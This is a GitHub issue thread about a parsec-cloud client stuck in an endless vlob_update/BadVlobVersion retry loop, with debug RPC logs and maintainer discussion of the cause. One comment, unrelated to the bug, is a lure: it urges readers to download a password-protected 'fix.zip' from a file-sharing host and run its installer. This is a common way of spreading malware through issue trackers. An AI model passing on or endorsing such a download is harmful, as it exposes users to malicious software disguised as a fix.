### ISSUE TITLE
Large amount of requests when synchronizing a file

### ISSUE THREAD

**Issue by vxgmichel** [Scille/parsec-cloud#8179]
While uploading a small file using the testbed server and the test environments (`run_testenv`), I noticed that many requests were performed by the client, about 4000: [logs.txt](https://github.com/user-attachments/files/16748272/logs.txt)

More specifically, 2 requests are being spammed:
- `vlob_update`, returning a `BadVlobVersion`
- `vlob_read_batch` returning `OK`

Here's a sample:
```
2024-08-26T10:08:50.022299Z [debug    ] RPC start                      api=4.0 auth=authenticated device=de20a11cec0010000000000000000000 organization=Org1 req=VlobUpdateReq { blob: b"W\xda\xe9\x7f&\xc5;\x96H(\xcf\x1a|R,\xe0\xfb<\x1d=\xcaq\x98H\x16\x88/\x91~4\xd1\xa5C\x0b'\x08\xb0K\x1c\xc3\xea2,.\xeaK)\x06\x13Ay\x19\xe7U|\xb9I\xe2\xac\xf6+\xf2\xd6&\xe6\x18\xd8\xbe\x88\xdc},\xb8\xecg\xa6 \x90\x7f%U3\xc6\xe1?q\xceO\xa9\xb9\xe6\x10<V\xbc{c\x1c\xf5\xc0\xfc\x90\x8ao)!\x8c\xeb\xf1\xc6\x0fA\\\xde\x15\xb1\xad\xc0c\x1b\x8f\xf6H\xbd\xab\xfew\x90\xb6\x11go0'?j\x17\xe1@\xf9A\xee\xf1\x13\x8dA\xe9K\xc9\xc5\x82\xf5-0N\xe0D\x1d\xee\\\xd8\x03\xceY\x06\x02\xc4T\xbe+,k,\xffx\n\xaf2\xdb\xbd@SnJ\xea\xd9\xf7*Q\xcd \xd3\xde\xdc\xbd\x7f6\x11Ev\xb8\xf0\x97\x96\xb4Z\x93\xe2\xc0Jj\x98z\xbfW\xd9&\xd6\x95\xffv\xa27\x9eN\x81qKY\x93\xa2\x98B\xb6\xf7\xb5\x11k\xa8\x1e\xfcd\x16\xa9\xb2\xfei\xe2\xae\x81\xcd\xec\xe4\xc9\xa3u\x9e\xc0>\xde\x13\x89\xec\xb1\x10\xfc+phZ<U\xb4\xc3\x81b\x84\xc7\xa2<Az\xe6\xb8\x9aL\xb4\x17c|:?\xcczu\x1bF\xf1_p\xe6\xa8\xcexiX\xd0xYb\x84\x9b\xcaVi!o\xe4~\xcf*\xb1\xe4\xf5", key_index: 1, sequester_blob: None, timestamp: DateTime("2024-08-26T10:08:50.020226Z"), version: 3, vlob_id: VlobID(f0000000-0000-0000-0000-000000000004) } request=543444316c9f4790a7920ad5a384603c
2024-08-26T10:08:50.022586Z [info     ] RPC                            api=4.0 auth=authenticated cmd=vlob_update device=de20a11cec0010000000000000000000 organization=Org1 rep=BadVlobVersion request=543444316c9f4790a7920ad5a384603c status=RepBadVlobVersion
2024-08-26T10:08:50.023564Z [debug    ] RPC start                      api=4.0 auth=authenticated device=de20a11cec0010000000000000000000 organization=Org1 req=VlobReadBatchReq { at: None, realm_id: VlobID(f0000000-0000-0000-0000-000000000004), vlobs: [VlobID(f0000000-0000-0000-0000-000000000004)] } request=6c390026a7084bfba871e9e2cdfdcde1
2024-08-26T10:08:50.023737Z [info     ] RPC                            api=4.0 auth=authenticated cmd=vlob_read_batch device=de20a11cec0010000000000000000000 organization=Org1 rep=Ok { items: [(VlobID(f0000000-0000-0000-0000-000000000004), 1, DeviceID { nickname: "alice@dev1", id: "de10a11c-ec00-1000-0000-000000000000" }, 1, DateTime("2000-01-13T00:00:00Z"), b"Z\x18\x05\xc9\xa7\x82U\xbd\xf4\x8f9`\xa3\x9d\xd3\xde\xaf_[\x12#1G\xc9\xc2 ,E~\x19\x81K\xde2>#\x1a\xca\x96\xf3\x18Zw\x1b E\xa4Y\x9dJ\xae\x0bW2\x89\x1a(\xb1\xd5\x92`\xbe\xe8\x96\n\x9fP\x8f\xf17U\x88\\\xc2>\xd7_\t\xbdL\xee\x971\x10Y2\x95\x02:\x93\xf2\x1e&\xf3\x90\xbfk\xd9\x8e%\xb7j\x1a\x1bj\x8c\x87\x10\xf1|\xdb'\xbb\xda\xe1\xe6}-V\x89\xafU\x9a\xc5\x94v\xf8\xa0c}\xa9\\\xb9\x1f\xf2\xb3\xbbZH\xe4\x06\x86\x19\x0f\xee\x06\xb0\xd7\x8a0\x1c6\xce^'a+`\x9ah\xd4&\xdc\xff\xaf_\\\xb1]\x8a\xadh\\\x1f\xb5\xe4zo\x03i\x1fj[\x8ckLt\xca\x9eQ5N\xe1\xf2If\nS\xdb\xa2\xfb\xc4\x89\xf7\xde\x0b\r\xd2\x19\xe9\xd2\xe7\xa7\xee\x9b\xbazQ\xa6nV\x95\\<\xa4\xe7\xf3\x95Cg\xcb(\xf9o-S")], needed_common_certificate_timestamp: DateTime("2000-01-06T00:00:00Z"), needed_realm_certificate_timestamp: DateTime("2000-01-12T00:00:00Z") } request=6c390026a7084bfba871e9e2cdfdcde1 status=RepOk
2024-08-26T10:08:50.026957Z [debug    ] RPC start                      api=4.0 auth=authenticated device=de20a11cec0010000000000000000000 organization=Org1 req=VlobUpdateReq { blob: b"\x1a\xdf\xff\xfap\x0b\xe9\x18}\x04\xcc\"]\xeb\x8e\r,\x93S\x8d,\xf8i\x14\xc4\x98\xc7\x97\xe4.\x88\xa6\xb9]\x1b\xf1>\x93s\xc4y\xae\x8b(\x06\x96\xaeE\x12<\xf6%\0\xb3,\x19\x9d\x0f\xb32XP\x7f\xe7\xde\xfd\x8b\x97+\xad\xfd\xba\x9c\xadv\xca\xc4y\xe2\x05\xe6\xfdT1n\xa2M\xabZ\x0b\x1d\xe5\xd5e\x1a\x9b\n\xfc\x82u\xc6\"7\xc2;@'N]5:\x85\x8b\r\xebB\xcdJP0%\x07\xfa?\xa6\x04\x8b\x8e\x91\x1b'i\xb6\x1d\xc9\x9cJ\xe3\xa99\xb9\x80<>\xa4?\xdf\x9b\x0e\xc9\x10\x8a0\xfe\xa8\xa4\xd4\xb1\xa0\xb6\x01\t\x88\xb9\xa2\xa8\x94f>:W2\xd4 \x0f}\xed\r\xdc|M\x0b0\xbf\xf4\x0e.\x1d\xbdqsQ\n\x97.\xf6\xaf\xf2\xf9\x0fm\xe8\x01\n\xa1\xbc\xef\x87\x89\xc0\x07[\xf6\xafp\xe7\x0f\x8cu[\"\xef\xae\x12\x10\x89d <W\x1f<\xffp\x9a\x95\xbb\xd1\xdc[\xef\xbf|X\xf1\xcc\xb8\x92\xa8\x80\xd3\xf0\x90\xce\x15L\x12K\xff\x02<k\x1aSC\x9bF}R\x1c\x07\xe4v\0\xf7hR]\xc0\x1e\x02\xf7\x91\xe0\x9e\xc5\x98\xef\x82\xaf\xc1'\xa8\x84\xfa\0\xb9\x8a\x8d\xf8\x12y\xafT\xa3\xf5h\xfc\x94\xc5s\xc8\xed\x8d\x81dW\x7f\"\xd6.\xe8{/", key_index: 1, sequester_blob: None, timestamp: DateTime("2024-08-26T10:08:50.025311Z"), version: 3, vlob_id: VlobID(f0000000-0000-0000-0000-000000000004) } request=a3866f8602de4dad84c68b386a712e58
2024-08-26T10:08:50.027220Z [info     ] RPC                            api=4.0 auth=authenticated cmd=vlob_update device=de20a11cec0010000000000000000000 organization=Org1 rep=BadVlobVersion request=a3866f8602de4dad84c68b386a712e58 status=RepBadVlobVersion
2024-08-26T10:08:50.028095Z [debug    ] RPC start                      api=4.0 auth=authenticated device=de20a11cec0010000000000000000000 organization=Org1 req=VlobReadBatchReq { at: None, realm_id: VlobID(f0000000-0000-0000-0000-000000000004), vlobs: [VlobID(f0000000-0000-0000-0000-000000000004)] } request=0f7671588b084e14982fc08f77e16582
2024-08-26T10:08:50.028402Z [info     ] RPC                            api=4.0 auth=authenticated cmd=vlob_read_batch device=de20a11cec0010000000000000000000 organization=Org1 rep=Ok { items: [(VlobID(f0000000-0000-0000-0000-000000000004), 1, DeviceID { nickname: "alice@dev1", id: "de10a11c-ec00-1000-0000-000000000000" }, 1, DateTime("2000-01-13T00:00:00Z"), b"Z\x18\x05\xc9\xa7\x82U\xbd\xf4\x8f9`\xa3\x9d\xd3\xde\xaf_[\x12#1G\xc9\xc2 ,E~\x19\x81K\xde2>#\x1a\xca\x96\xf3\x18Zw\x1b E\xa4Y\x9dJ\xae\x0bW2\x89\x1a(\xb1\xd5\x92`\xbe\xe8\x96\n\x9fP\x8f\xf17U\x88\\\xc2>\xd7_\t\xbdL\xee\x971\x10Y2\x95\x02:\x93\xf2\x1e&\xf3\x90\xbfk\xd9\x8e%\xb7j\x1a\x1bj\x8c\x87\x10\xf1|\xdb'\xbb\xda\xe1\xe6}-V\x89\xafU\x9a\xc5\x94v\xf8\xa0c}\xa9\\\xb9\x1f\xf2\xb3\xbbZH\xe4\x06\x86\x19\x0f\xee\x06\xb0\xd7\x8a0\x1c6\xce^'a+`\x9ah\xd4&\xdc\xff\xaf_\\\xb1]\x8a\xadh\\\x1f\xb5\xe4zo\x03i\x1fj[\x8ckLt\xca\x9eQ5N\xe1\xf2If\nS\xdb\xa2\xfb\xc4\x89\xf7\xde\x0b\r\xd2\x19\xe9\xd2\xe7\xa7\xee\x9b\xbazQ\xa6nV\x95\\<\xa4\xe7\xf3\x95Cg\xcb(\xf9o-S")], needed_common_certificate_timestamp: DateTime("2000-01-06T00:00:00Z"), needed_realm_certificate_timestamp: DateTime("2000-01-12T00:00:00Z") } request=0f7671588b084e14982fc08f77e16582 status=RepOk
```

I observed it several times. 

I later tried to reproduce it using a workflow similar to https://github.com/Scille/parsec-cloud/issues/8178 but I did not manage to do so.

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mmmarcos** [comment]
I encountered the same problem, but it happens only from time to time. The client gets locked in a "cannot update vlob --> sync --> cannot update vlob" endless loop.

This seems to happens on the vlob corresponding to the workspace root manifest (`VlobID` ending in `0004`, which is the same as the `RealmID`). Sometimes when importing (or deleting, or renaming) a file :
1. the vlob version used by the client to update the vlob (let's say `N`) returns `BadVlobVersion`
1. which triggers a sync (`vlob_read_batch`) that succeeds
1. which re-triggers the vlob update, but with the same version `N` as before
1. therefore resulting in an endless loop.

Maybe a bug in the way the new version is guessed in `inbound_sync`?
Could this be caused by a missing event?

**Comment by touilleMan** [comment]
My thoery is this have been fixed by #8241 (basically the database for test ended up on disk and hence was re-used between test runs, which leads to the server and client not agreeing on which version should be the next one for a given file...)

I've opened a dedicated issue about the fact an infinite loop in the client is never a good thing

Re-open if that's not the case :pray:
